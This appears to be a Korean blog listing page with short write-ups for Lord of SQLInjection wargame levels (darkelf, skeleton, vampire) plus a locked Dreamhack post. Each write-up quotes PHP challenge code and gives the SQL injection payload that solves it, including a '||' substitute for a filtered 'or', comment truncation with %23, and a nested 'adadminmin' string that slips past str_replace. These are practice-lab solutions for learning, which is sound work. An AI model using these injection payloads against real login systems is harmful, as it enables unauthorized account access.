Web8 [Dreamhack] Guest book 풀이 보호되어 있는 글 입니다. 2022. 11. 28. [LoS] darkelf 풀이 query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("darkelf"); highlight_file(__FILE__); ?>코드보면 알겠지만 or이나 and라는 문자열 없이 쿼리에 입력해야한다.그리고 마지막에 result의 id가 admin이여야 하니까그냥 쿼리에 ?pw=' || id='admin을 붙여주면 된다. 2022. 11. 11. [LoS] skeleton 풀이 query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id'] == 'admin') solve("skeleton"); highlight_file(__FILE__); ?>쿼리에선 pw를 받고 1=0이라는 문제가 많은 문장이 있지만 주석처리하면 되니 문제가 없다!?pw='or id='admin'%23를 붙여주면 끝! 성공! 2022. 11. 10. [LoS] vampire 풀이 query : {$query}"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id'] == 'admin') solve("vampire"); highlight_file(__FILE__); ?>스터디에서 주신 ppt를 기반으로 풀었다. str_replace()함수를 우회하기 위해 admin이라고 쓸 것을 adadminmin이라고 하면, str_replace함수에 의해 중간의 admin이 없어져 그냥 admin이 된다. 성공! 2022. 11. 10. 이전 1 2 다음
